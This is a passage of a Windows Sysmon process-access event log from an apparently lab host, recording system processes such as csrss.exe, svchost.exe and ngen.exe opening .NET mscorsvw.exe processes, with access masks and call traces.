.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.402\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010C5160D00}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.402","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010C5160D00}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.402\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010C5160D00}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.402","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010C5160D00}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.495\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010B91A0D00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.495","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010B91A0D00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.495\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010B91A0D00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.495","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010B91A0D00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-0010B91A0D00}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-0010B91A0D00}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.589\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00104C1E0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.589","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00104C1E0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.589\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00104C1E0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.589","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00104C1E0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.589\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00104C1E0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.589","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00104C1E0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
